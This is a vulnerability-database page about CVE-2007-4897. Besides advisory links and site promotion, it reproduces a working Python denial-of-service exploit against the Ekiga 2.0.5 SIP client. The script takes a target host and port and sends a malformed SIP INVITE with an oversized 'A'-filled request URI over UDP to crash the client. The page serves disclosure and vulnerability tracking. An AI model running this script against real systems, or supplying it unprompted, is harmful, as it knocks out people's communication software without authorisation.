Vulners
Lucene search
Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
 | Ekiga 2.0.5 (GetHostAddress) Remote Denial of Service Exploit | 24 Jul 200900:00 | – | zdt |
 | CentOS 5 : pwlib (CESA-2007:0932) | 6 Jan 201000:00 | – | nessus |
| Mandrake Linux Security Advisory : pwlib (MDKSA-2007:206) | 5 Nov 200700:00 | – | nessus |
| RHEL 5 : pwlib (RHSA-2007:0932) | 9 Oct 200700:00 | – | nessus |
| Scientific Linux Security Update : pwlib on SL5.x i386/x86_64 | 1 Aug 201200:00 | – | nessus |
| Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : pwlib vulnerability (USN-561-1) | 10 Jan 200800:00 | – | nessus |
 | pwlib security update | 9 Oct 200723:40 | – | centos |
 | CVE-2007-4897 | 24 Jul 200900:00 | – | circl |
 | CVE-2007-4897 | 14 Sep 200718:00 | – | cve |
 | CVE-2007-4897 | 14 Sep 200718:00 | – | cvelist |
10
#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs
import sys,socket
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
"Call-ID:[email protected]\r\n"+\
"Contact:sip:[email protected]:5060\r\n"+\
"Content-Length:417\r\n"+\
"Content-Type:application/sdp\r\n"+\
"CSeq:4321 INVITE\r\n"+\
"From:sip:[email protected]:5060;tag=a48s\r\n"+\
"Max-Forwards:70\r\n"+\
"To:sip:[email protected]\r\n"+\
"Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()
# milw0rm.com [2009-07-24]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2009 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 25
EPSS0.22734